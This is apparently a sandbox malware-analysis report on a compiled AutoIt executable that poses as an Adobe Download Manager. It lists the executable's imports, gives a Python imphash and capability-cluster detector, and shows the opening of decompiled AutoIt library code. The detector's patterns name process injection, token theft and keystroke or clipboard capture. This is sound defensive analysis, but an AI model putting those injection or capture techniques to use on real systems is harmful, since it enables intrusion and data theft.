GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
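Because the report classifies this file as a compiled AutoIt script, the import table above belongs to the AutoIt interpreter rather than to the script it wraps: every script compiled with the same interpreter build carries the same table and therefore the same Import Hash, so the hash identifies the wrapper, not the payload. What the table does tell an analyst is which capabilities the interpreter hands any script for free, e.g. OpenProcess/VirtualAllocEx/WriteProcessMemory for the process-injection behaviour the report observed. The Python below is an added example written for this report, not Joe Sandbox code: it parses the run-together `NAME.dllFunc, Func` lines as the report prints them, normalises them the way pefile's imphash does (lowercase, extension stripped, `lib.func` joined by commas in table order, MD5), and flags capability clusters. The clusters in `CAPABILITIES` are my own analyst heuristics, not a published taxonomy; `SAMPLE_LISTING` is a constructed excerpt of five DLLs from the table above (trimmed), so its hash will not equal the report's value, and ordinal-only imports are not resolved because this sample imports by name only.

```python
import hashlib
import re

# Capability clusters worth flagging in an import table (analyst heuristic, assumed here);
# every API in a set must be present for the cluster to fire.
CAPABILITIES = {
    "remote process write (injection primitive)": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"},
    "token duplication / run-as": {"OpenProcessToken", "DuplicateTokenEx", "CreateProcessAsUserW"},
    "raw TCP sockets": {"WSAStartup", "socket", "connect", "send", "recv"},
    "HTTP/FTP client": {"InternetOpenW", "InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW"},
    "keystroke/clipboard capture": {"GetAsyncKeyState", "GetKeyboardState", "GetClipboardData"},
    "input simulation": {"SendInput", "mouse_event", "keybd_event", "BlockInput"},
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
}

# Constructed excerpt of the report's import table (five of its DLLs, trimmed), kept in the
# report's run-together 'NAME.dllFirstFunc, ...' form so the parser handles it as printed.
SAMPLE_LISTING = """
WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, select, accept, listen, bind, closesocket, recv, sendto, send, inet_addr, gethostbyname, connect
PSAPI.DLLGetProcessMemoryInfo
KERNEL32.dllDuplicateHandle, CreateThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CreateProcessW, ResumeThread
USER32.dllGetAsyncKeyState, GetKeyboardState, GetClipboardData, SendInput, mouse_event, keybd_event, BlockInput
ADVAPI32.dllOpenProcessToken, DuplicateTokenEx, CreateProcessAsUserW, AdjustTokenPrivileges
"""

# The DLL name runs straight into the first function name, so split at the '.dll' boundary.
DLL_LINE = re.compile(r"\s*([\w\-]+\.(?:dll|DLL|ocx|sys))\s*(.*)$")

def parse_import_listing(text: str) -> list:
    """Split 'LIB.dllFunc1, Func2, ...' lines into (dll, [funcs]) pairs, preserving order."""
    out = []
    for line in text.strip().splitlines():
        m = DLL_LINE.match(line)
        if m:
            out.append((m.group(1), [f.strip() for f in m.group(2).split(",") if f.strip()]))
    return out

def imphash_string(imports: list) -> str:
    """Normalise as pefile's imphash does: lowercase, strip .dll/.ocx/.sys, 'lib.func' joined by ','.
    Import-table order is part of the hash, so a listing must be in table order to reproduce a tool's value."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        if lib.endswith((".dll", ".ocx", ".sys")):
            lib = lib[:-4]
        parts.extend("%s.%s" % (lib, f.lower()) for f in funcs)
    return ",".join(parts)

def imphash(imports: list) -> str:
    """MD5 of the normalised import string (ordinal imports are not resolved in this example)."""
    return hashlib.md5(imphash_string(imports).encode()).hexdigest()

def capabilities(imports: list) -> dict:
    """Return the capability clusters whose APIs are all present, with the matching API names."""
    present = {f for _, funcs in imports for f in funcs}
    return {cap: sorted(apis) for cap, apis in CAPABILITIES.items() if apis <= present}

if __name__ == "__main__":
    imps = parse_import_listing(SAMPLE_LISTING)
    print("imphash of excerpt:", imphash(imps))
    for cap, apis in capabilities(imps).items():
        print("  %-45s %s" % (cap, ", ".join(apis)))
```

Paste the full Imports block into `SAMPLE_LISTING` (or feed it from a file) to see every cluster the interpreter exposes; the hash printed for the full table only matches the report's Import Hash if the report lists DLLs and functions in import-table order, which is why the hash is better taken from a PE parser than from a rendered listing.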

Version Infos

Description      | Data
LegalCopyright   | Copyright 2018 Adobe Incorporated. All rights reserved.
FileVersion      | ...
CompanyName      | Adobe Systems Incorporated
ProductName      | Adobe Download Manager
ProductVersion   | ...
FileDescription  | Adobe Download Manager
OriginalFilename | Adobe Download Manager
Translation      | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken | Map
English                        | Great Britain                    |

                                        Static AutoIT Info

                                        General

Code:
GLOBAL CONST $OPT_COORDSRELATIVE = 0
GLOBAL CONST $OPT_COORDSABSOLUTE = 1
GLOBAL CONST $OPT_COORDSCLIENT = 2
GLOBAL CONST $OPT_ERRORSILENT = 0
GLOBAL CONST $OPT_ERRORFATAL = 1
GLOBAL CONST $OPT_CAPSNOSTORE = 0
GLOBAL CONST $OPT_CAPSSTORE = 1
GLOBAL CONST $OPT_MATCHSTART = 1
GLOBAL CONST $OPT_MATCHANY = 2
GLOBAL CONST $OPT_MATCHEXACT = 3
GLOBAL CONST $OPT_MATCHADVANCED = 4
GLOBAL CONST $CCS_TOP = 1
GLOBAL CONST $CCS_NOMOVEY = 2
GLOBAL CONST $CCS_BOTTOM = 3
GLOBAL CONST $CCS_NORESIZE = 4
GLOBAL CONST $CCS_NOPARENTALIGN = 8
GLOBAL CONST $CCS_NOHILITE = 16
GLOBAL CONST $CCS_ADJUSTABLE = 32
GLOBAL CONST $CCS_NODIVIDER = 64
GLOBAL CONST $CCS_VERT = 128
GLOBAL CONST $CCS_LEFT = 129
GLOBAL CONST $CCS_NOMOVEX = 130
GLOBAL CONST $CCS_RIGHT = 131
GLOBAL CONST $DT_DRIVETYPE = 1
GLOBAL CONST $DT_SSDSTATUS = 2
GLOBAL CONST $DT_BUSTYPE = 3
GLOBAL CONST $PROXY_IE = 0
GLOBAL CONST $PROXY_NONE = 1
GLOBAL CONST $PROXY_SPECIFIED = 2
GLOBAL CONST $OBJID_WINDOW = 0
GLOBAL CONST $OBJID_TITLEBAR = 4294967294
GLOBAL CONST $OBJID_SIZEGRIP = 4294967289
GLOBAL CONST $OBJID_CARET = 4294967288
GLOBAL CONST $OBJID_CURSOR = 4294967287
GLOBAL CONST $OBJID_ALERT = 4294967286
GLOBAL CONST $OBJID_SOUND = 4294967285
GLOBAL CONST $DLG_CENTERONTOP = 0
GLOBAL CONST $DLG_NOTITLE = 1
GLOBAL CONST $DLG_NOTONTOP = 2
GLOBAL CONST $DLG_TEXTLEFT = 4
GLOBAL CONST $DLG_TEXTRIGHT = 8
GLOBAL CONST $DLG_MOVEABLE = 16
GLOBAL CONST $DLG_TEXTVCENTER = 32
GLOBAL CONST $IDC_UNKNOWN = 0
GLOBAL CONST $IDC_APPSTARTING = 1
GLOBAL CONST $IDC_ARROW = 2
GLOBAL CONST $IDC_CROSS = 3
GLOBAL CONST $IDC_HAND = 32649
GLOBAL CONST $IDC_HELP = 4
GLOBAL CONST $IDC_IBEAM = 5
GLOBAL CONST $IDC_ICON = 6
GLOBAL CONST $IDC_NO = 7
GLOBAL CONST $IDC_SIZE = 8
GLOBAL CONST $IDC_SIZEALL = 9
GLOBAL CONST $IDC_SIZENESW = 10
GLOBAL CONST $IDC_SIZENS = 11
GLOBAL CONST $IDC_SIZENWSE = 12
GLOBAL CONST $IDC_SIZEWE = 13
GLOBAL CONST $IDC_UPARROW = 14
GLOBAL CONST $IDC_WAIT = 15
GLOBAL CONST $IDI_APPLICATION = 32512
GLOBAL CONST $IDI_ASTERISK = 32516
GLOBAL CONST $IDI_EXCLAMATION = 32515
GLOBAL CONST $IDI_HAND = 32513
GLOBAL CONST $IDI_QUESTION = 32514
GLOBAL CONST $IDI_WINLOGO = 32517
GLOBAL CONST $IDI_SHIELD = 32518
GLOBAL CONST $IDI_ERROR = $IDI_HAND
GLOBAL CONST $IDI_INFORMATION = $IDI_ASTERISK
GLOBAL CONST $IDI_WARNING = $IDI_EXCLAMATION
GLOBAL CONST $SD_LOGOFF = 0
GLOBAL CONST $SD_SHUTDOWN = 1
GLOBAL CONST $SD_REBOOT = 2
GLOBAL CONST $SD_FORCE = 4
GLOBAL CONST $SD_POWERDOWN = 8
GLOBAL CONST $SD_FORCEHUNG = 16
GLOBAL CONST $SD_STANDBY = 32
GLOBAL CONST $SD_HIBERNATE = 64
GLOBAL CONST $STDIN_CHILD = 1
GLOBAL CONST $STDOUT_CHILD = 2
GLOBAL CONST $STDERR_CHILD = 4
GLOBAL CONST $STDERR_MERGED = 8
GLOBAL CONST $STDIO_INHERIT_PARENT = 16
GLOBAL CONST $RUN_CREATE_NEW_CONSOLE = 65536
GLOBAL CONST $UBOUND_DIMENSIONS = 0
GLOBAL CONST $UBOUND_ROWS = 1
GLOBAL CONST $UBOUND_COLUMNS = 2
GLOBAL CONST $MOUSEEVENTF_ABSOLUTE = 32768
GLOBAL CONST $MOUSEEVENTF_MOVE = 1
GLOBAL CONST $MOUSEEVENTF_LEFTDOWN = 2
GLOBAL CONST $MOUSEEVENTF_LEFTUP = 4
GLOBAL CONST $MOUSEEVENTF_RIGHTDOWN = 8
GLOB AL CONST $MOUSEEVENTF_RIGHTUP = 16
GLOBAL CONST $MOUSEEVENTF_MIDDLEDOWN = 32
GLOBAL CONST $MOUSEEVENTF_MIDDLEUP = 64
GLOBAL CONST $MOUSEEVENTF_WHEEL = 2048
GLOBAL CONST $MOUSEEVENTF_XDOWN = 128
GLOBAL CONST $MOUSEEVENTF_XUP = 256
GLOBAL CONST $REG_NONE = 0
GLOBAL CONST $REG_SZ = 1
GLOBAL CONST $REG_EXPAND_SZ = 2
GLOBAL CONST $REG_BINARY = 3
GLOBAL CONST $REG_DWORD = 4
GLOBAL CONST $REG_DWORD_LITTLE_ENDIAN = 4
GLOBAL CONST $REG_DWORD_BIG_ENDIAN = 5
GLOBAL CONST $REG_LINK = 6
GLOBAL CONST $REG_MULTI_SZ = 7
GLOBAL CONST $REG_RESOURCE_LIST = 8
GLOBAL CONST $REG_FULL_RESOURCE_DESCRIPTOR = 9
GLOBAL CONST $REG_RESOURCE_REQUIREMENTS_LIST = 10
GLOBAL CONST $REG_QWORD = 11
GLOBAL CONST $REG_QWORD_LITTLE_ENDIAN = 11
GLOBAL CONST $HWND_BOTTOM = 1
GLOBAL CONST $HWND_NOTOPMOST = + 4294967294
GLOBAL CONST $HWND_TOP = 0
GLOBAL CONST $HWND_TOPMOST = + 4294967295
GLOBAL CONST $SWP_NOSIZE = 1
GLOBAL CONST $SWP_NOMOVE = 2
GLOBAL CONST $SWP_NOZORDER = 4
GLOBAL CONST $SWP_NOREDRAW = 8
GLOBAL CONST $SWP_NOACTIVATE = 16
GLOBAL CONST $SWP_FRAMECHANGED = 32
GLOBAL CONST $SWP_DRAWFRAME = 32
GLOBAL CONST $SWP_SHOWWINDOW = 64
GLOBAL CONST $SWP_HIDEWINDOW = 128
GLOBAL CONST $SWP_NOCOPYBITS = 256
GLOBAL CONST $SWP_NOOWNERZORDER = 512
GLOBAL CONST $SWP_NOREPOSITION = 512
GLOBAL CONST $SWP_NOSENDCHANGING = 1024
GLOBAL CONST $SWP_DEFERERASE = 8192
GLOBAL CONST $SWP_ASYNCWINDOWPOS = 16384
GLOBAL CONST $KEYWORD_DEFAULT = 1
GLOBAL CONST $KEYWORD_NULL = 2
GLOBAL CONST $DECLARED_LOCAL = + 4294967295
GLOBAL CONST $DECLARED_UNKNOWN = 0
GLOBAL CONST $DECLARED_GLOBAL = 1
GLOBAL CONST $ASSIGN_CREATE = 0
GLOBAL CONST $ASSIGN_FORCELOCAL = 1
GLOBAL CONST $ASSIGN_FORCEGLOBAL = 2
GLOBAL CONST $ASSIGN_EXISTFAIL = 4
GLOBAL CONST $BI_ENABLE = 0
GLOBAL CONST $BI_DISABLE = 1
GLOBAL CONST $BREAK_ENABLE = 1
GLOBAL CONST $BREAK_DISABLE = 0
GLOBAL CONST $CDTRAY_OPEN = "open"
GLOBAL CONST $CDTRAY_CLOSED = "closed"
GLOBAL CONST $SEND_DEFAULT = 0
GLOBAL CONST $SEND_RAW = 1
GLOBAL CONST $DIR_DEFAULT = 0
GLOBAL CONST $DIR_EXTENDED = 1
GLOBAL CONST $DIR_NORECURSE = 2
GLOBAL CONST $DIR_REMOVE = 1
GLOBAL CONST $DT_ALL = "ALL"
GLOBAL CONST $DT_CDROM = "CDROM"
GLOBAL CONST $DT_REMOVABLE = "REMOVABLE"
GLOBAL CONST $DT_FIXED = "FIXED"
GLOBAL CONST $DT_NETWORK = "NETWORK"
GLOBAL CONST $DT_RAMDISK = "RAMDISK"
GLOBAL CONST $DT_UNKNOWN = "UNKNOWN"
GLOBAL CONST $DT_UNDEFINED = 1
GLOBAL CONST $DT_FAT = "FAT"
GLOBAL CONST $DT_FAT32 = "FAT32"
GLOBAL CONST $DT_EXFAT = "exFAT"
GLOBAL CONST $DT_NTFS = "NTFS"
GLOBAL CONST $DT_NWFS = "NWFS"
GLOBAL CONST $DT_CDFS = "CDFS"
GLOBAL CONST $DT_UDF = "UDF"
GLOBAL CONST $DMA_DEFAULT = 0
GLOBAL CONST $DMA_PERSISTENT = 1
GLOBAL CONST $DMA_AUTHENTICATION = 8
GLOBAL CONST $DS_UNKNOWN = "UNKNOWN"
GLOBAL CONST $DS_READY = "READY"
GLOBAL CONST $DS_NOTREADY = "NOTREADY"
GLOBAL CONST $DS_INVALID = "INVALID"
GLOBAL CONST $MOUSE_CLICK_LEFT = "left"
GLOBAL CONST $MOUSE_CLICK_RIGHT = "right"
GLOBAL CONST $MOUSE_CLICK_MIDDLE = "middle"
GLOBAL CONST $MOUSE_CLICK_MAIN = "main"
GLOBAL CONST $MOUSE_CLICK_MENU = "menu"
GLOBAL CONST $MOUSE_CLICK_PRIMARY = "primary"
GLOBAL CONST $MOUSE_CLICK_SECONDARY = "secondary"
GLOBAL CONST $MOUSE_WHEEL_UP = "up"
GLOBAL CONST $MOUSE_WHEEL_DOWN = "down"
GLOBAL CONST $NUMBER_AUTO = 0
GLOBAL CONST $NUMBER_32BIT = 1
GLOBAL CONST $NUMBER_64BIT = 2
GLOBAL CONST $NUMBER_DOUBLE = 3
GLOBAL CONST $OBJ_NAME = 1
GLOBAL CONST $OBJ_STRING = 2
GLOBAL CONST $OBJ_PROGID = 3
GLOBAL CONST $OBJ_FILE = 4
GLOBAL CONST $OBJ_MODULE = 5
GLOBAL CONST $OBJ_CLSID = 6
GLOBAL CONST $OBJ_IID = 7
GLOBAL CONST $EXITCLOSE_NORMAL = 0
GLOBAL CONST $EXITCLOSE_BYEXIT = 1
GLOBAL CONST $EXITCLOSE_BYCLICK = 2
GLOBAL CONST $EXITCLOSE_BYLOGOFF = 3
GLOBAL CONST $EXITCLOSE_BYSUTDOWN = 4
GLOBAL CONST $PROCESS_STATS_MEMORY = 0
GLOBAL CONST $PROCESS_STATS_IO = 1
GLOBAL CONST $PROCESS_LOW = 0
GLOBAL CONST $PROCESS_BELOWNORMAL = 1
GLOBAL CONST $PROCESS_NORMAL = 2
GLOBAL CONST $PROCESS_ABOVENORMAL = 3
GLOBAL CONST $PROCESS_HIGH = 4
GLOBAL CONST $PROCESS_REALTIME = 5
GLOBAL CONST $RUN_LOGON_NOPROFILE = 0
GLOBAL CONST $RUN_LOGON_PROFILE = 1
GLOBAL CONST $RUN_LOGON_NETWORK = 2
GLOBAL CONST $RUN_LOGON_INHERIT = 4
GLOBAL CONST $SOUND_NOWAIT = 0
GLOBAL CONST $SOUND_WAIT = 1
GLOBAL CONST $SHEX_OPEN = "open"
GLOBAL CONST $SHEX_EDIT = "edit"
GLOBAL CONST $SHEX_PRINT = "print"
GLOBAL CONST $SHEX_PROPERTIES = "properties"
GLOBAL CONST $TCP_DATA_DEFAULT = 0
GLOBAL CONST $TCP_DATA_BINARY = 1
GLOBAL CONST $UDP_OPEN_DEFAULT = 0
GLOBAL CONST $UDP_OPEN_BROADCAST = 1
GLOBAL CONST $UDP_DATA_DEFAULT = 0
GLOBAL CONST $UDP_DATA_BINARY = 1
GLOBAL CONST $UDP_DATA_ARRAY = 2
GLOBAL CONST $TIP_NOICON = 0
GLOBAL CONST $TIP_INFOICON = 1
GLOBAL CONST $TIP_WARNINGICON = 2
GLOBAL CONST $TIP_ERRORICON = 3
GLOBAL CONST $TIP_BALLOON = 1
GLOBAL CONST $TIP_CENTER = 2
GLOBAL CONST $TIP_FORCEVISIBLE = 4
GLOBAL CONST $WINDOWS_NOONTOP = 0
GLOBAL CONST $WINDOWS_ONTOP = 1
GLOBAL CONST $MB_OK = 0
GLOBAL CONST $MB_OKCANCEL = 1
GLOBAL CONST $MB_ABORTRETRYIGNORE = 2 GLOBAL CONST $MB_YESNOCANCEL = 3 GLOBAL CONST $MB_YESNO = 4 GLOBAL CONST $MB_RETRYCANCEL = 5 GLOBAL CONST $MB_CANCELTRYCONTINUE = 6 GLOBAL CONST $MB_HELP = 16384 GLOBAL CONST $MB_ICONSTOP = 16 GLOBAL CONST $MB_ICONERROR = 16 GLOBAL CONST $MB_ICONHAND = 16 GLOBAL CONST $MB_ICONQUESTION = 32 GLOBAL CONST $MB_ICONEXCLAMATION = 48 GLOBAL CONST $MB_ICONWARNING = 48 GLOBAL CONST $MB_ICONINFORMATION = 64 GLOBAL CONST $MB_ICONASTERISK = 64 GLOBAL CONST $MB_USERICON = 128 GLOBAL CONST $MB_DEFBUTTON1 = 0 GLOBAL CONST $MB_DEFBUTTON2 = 256 GLOBAL CONST $MB_DEFBUTTON3 = 512 GLOBAL CONST $MB_DEFBUTTON4 = 768 GLOBAL CONST $MB_APPLMODAL = 0 GLOBAL CONST $MB_SYSTEMMODAL = 4096 GLOBAL CONST $MB_TASKMODAL = 8192 GLOBAL CONST $MB_DEFAULT_DESKTOP_ONLY = 131072 GLOBAL CONST $MB_RIGHT = 524288 GLOBAL CONST $MB_RTLREADING = 1048576 GLOBAL CONST $MB_SETFOREGROUND = 65536 GLOBAL CONST $MB_TOPMOST = 262144 GLOBAL CONST $MB_SERVICE_NOTIFICATION = 2097152 GLOBAL CONST $MB_RIGHTJUSTIFIED = $MB_RIGHT GLOBAL CONST $IDTIMEOUT = + 4294967295 GLOBAL CONST $IDOK = 1 GLOBAL CONST $IDCANCEL = 2 GLOBAL CONST $IDABORT = 3 GLOBAL CONST $IDRETRY = 4 GLOBAL CONST $IDIGNORE = 5 GLOBAL CONST $IDYES = 6 GLOBAL CONST $IDNO = 7 GLOBAL CONST $IDCLOSE = 8 GLOBAL CONST $IDHELP = 9 GLOBAL CONST $IDTRYAGAIN = 10 GLOBAL CONST $IDCONTINUE = 11 GLOBAL CONST $STR_NOCASESENSE = 0 GLOBAL CONST $STR_CASESENSE = 1 GLOBAL CONST $STR_NOCASESENSEBASIC = 2 GLOBAL CONST $STR_STRIPLEADING = 1 GLOBAL CONST $STR_STRIPTRAILING = 2 GLOBAL CONST $STR_STRIPSPACES = 4 GLOBAL CONST $STR_STRIPALL = 8 GLOBAL CONST $STR_CHRSPLIT = 0 GLOBAL CONST $STR_ENTIRESPLIT = 1 GLOBAL CONST $STR_NOCOUNT = 2 GLOBAL CONST $STR_REGEXPMATCH = 0 GLOBAL CONST $STR_REGEXPARRAYMATCH = 1 GLOBAL CONST $STR_REGEXPARRAYFULLMATCH = 2 GLOBAL CONST $STR_REGEXPARRAYGLOBALMATCH = 3 GLOBAL CONST $STR_REGEXPARRAYGLOBALFULLMATCH = 4 GLOBAL CONST $STR_ENDISSTART = 0 GLOBAL CONST $STR_ENDNOTSTART = 1 GLOBAL CONST $SB_ANSI = 1 GLOBAL 
CONST $SB_UTF16LE = 2 GLOBAL CONST $SB_UTF16BE = 3 GLOBAL CONST $SB_UTF8 = 4 GLOBAL CONST $SE_UTF16 = 0 GLOBAL CONST $SE_ANSI = 1 GLOBAL CONST $SE_UTF8 = 2 GLOBAL CONST $STR_UTF16 = 0 GLOBAL CONST $STR_UCS2 = 1 GLOBAL ENUM $ARRAYFILL_FORCE_DEFAULT , $ARRAYFILL_FORCE_SINGLEITEM , $ARRAYFILL_FORCE_INT , $ARRAYFILL_FORCE_NUMBER , $ARRAYFILL_FORCE_PTR , $ARRAYFILL_FORCE_HWND , $ARRAYFILL_FORCE_STRING GLOBAL ENUM $ARRAYUNIQUE_NOCOUNT , $ARRAYUNIQUE_COUNT GLOBAL ENUM $ARRAYUNIQUE_AUTO , $ARRAYUNIQUE_FORCE32 , $ARRAYUNIQUE_FORCE64 , $ARRAYUNIQUE_MATCH , $ARRAYUNIQUE_DISTINCT FUNC _ARRAYADD (BYREF $AARRAY , $VVALUE , $ISTART = 0 , $SDELIM_ITEM = "|" , $SDELIM_ROW = @CRLF , $IFORCE = $ARRAYFILL_FORCE_DEFAULT ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $SDELIM_ITEM = DEFAULT THEN $SDELIM_ITEM = "|" IF $SDELIM_ROW = DEFAULT THEN $SDELIM_ROW = @CRLF IF $IFORCE = DEFAULT THEN $IFORCE = $ARRAYFILL_FORCE_DEFAULT IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) LOCAL $HDATATYPE = 0 SWITCH $IFORCE CASE $ARRAYFILL_FORCE_INT $HDATATYPE = INT CASE $ARRAYFILL_FORCE_NUMBER $HDATATYPE = NUMBER CASE $ARRAYFILL_FORCE_PTR $HDATATYPE = PTR CASE $ARRAYFILL_FORCE_HWND $HDATATYPE = HWND CASE $ARRAYFILL_FORCE_STRING $HDATATYPE = STRING ENDSWITCH SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IFORCE = $ARRAYFILL_FORCE_SINGLEITEM THEN REDIM $AARRAY [$IDIM_1 + 1 ] $AARRAY [$IDIM_1 ] = $VVALUE RETURN $IDIM_1 ENDIF IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $HDATATYPE = 0 ELSE LOCAL $ATMP = STRINGSPLIT ($VVALUE , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) IF UBOUND ($ATMP , $UBOUND_ROWS ) = 1 THEN $ATMP [0 ] = $VVALUE ENDIF $VVALUE = $ATMP ENDIF LOCAL $IADD = UBOUND ($VVALUE , $UBOUND_ROWS ) REDIM $AARRAY [$IDIM_1 + $IADD ] FOR $I = 0 TO $IADD + 4294967295 IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$IDIM_1 + $I ] = $HDATATYPE ($VVALUE [$I ] ) 
ELSE $AARRAY [$IDIM_1 + $I ] = $VVALUE [$I ] ENDIF NEXT RETURN $IDIM_1 + $IADD + 4294967295 CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ISTART < 0 OR $ISTART > $IDIM_2 + 4294967295 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IVALDIM_1 , $IVALDIM_2 = 0 , $ICOLCOUNT IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $IVALDIM_1 = UBOUND ($VVALUE , $UBOUND_ROWS ) $IVALDIM_2 = UBOUND ($VVALUE , $UBOUND_COLUMNS ) $HDATATYPE = 0 ELSE LOCAL $ASPLIT_1 = STRINGSPLIT ($VVALUE , $SDELIM_ROW , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $IVALDIM_1 = UBOUND ($ASPLIT_1 , $UBOUND_ROWS ) LOCAL $ATMP [$IVALDIM_1 ] [0 ] , $ASPLIT_2 FOR $I = 0 TO $IVALDIM_1 + 4294967295 $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $ICOLCOUNT = UBOUND ($ASPLIT_2 ) IF $ICOLCOUNT > $IVALDIM_2 THEN $IVALDIM_2 = $ICOLCOUNT REDIM $ATMP [$IVALDIM_1 ] [$IVALDIM_2 ] ENDIF FOR $J = 0 TO $ICOLCOUNT + 4294967295 $ATMP [$I ] [$J ] = $ASPLIT_2 [$J ] NEXT NEXT $VVALUE = $ATMP ENDIF IF UBOUND ($VVALUE , $UBOUND_COLUMNS ) + $ISTART > UBOUND ($AARRAY , $UBOUND_COLUMNS ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 + $IVALDIM_1 ] [$IDIM_2 ] FOR $IWRITETO_INDEX = 0 TO $IVALDIM_1 + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 IF $J < $ISTART THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = "" ELSEIF $J - $ISTART > $IVALDIM_2 + 4294967295 THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = "" ELSE IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = $HDATATYPE ($VVALUE [$IWRITETO_INDEX ] [$J - $ISTART ] ) ELSE $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = $VVALUE [$IWRITETO_INDEX ] [$J - $ISTART ] ENDIF ENDIF NEXT NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 ENDFUNC FUNC _ARRAYBINARYSEARCH (CONST BYREF $AARRAY , $VVALUE , $ISTART = 0 , $IEND = 0 , $ICOLUMN = 0 ) IF $ISTART = 
DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ICOLUMN = DEFAULT THEN $ICOLUMN = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF $IDIM_1 = 0 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $IEND < 1 OR $IEND > $IDIM_1 + 4294967295 THEN $IEND = $IDIM_1 + 4294967295 IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IMID = INT (($IEND + $ISTART ) / 2 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $AARRAY [$ISTART ] > $VVALUE OR $AARRAY [$IEND ] < $VVALUE THEN RETURN SETERROR (2 , 0 , + 4294967295 ) WHILE $ISTART <= $IMID AND $VVALUE <> $AARRAY [$IMID ] IF $VVALUE < $AARRAY [$IMID ] THEN $IEND = $IMID + 4294967295 ELSE $ISTART = $IMID + 1 ENDIF $IMID = INT (($IEND + $ISTART ) / 2 ) WEND IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) CASE 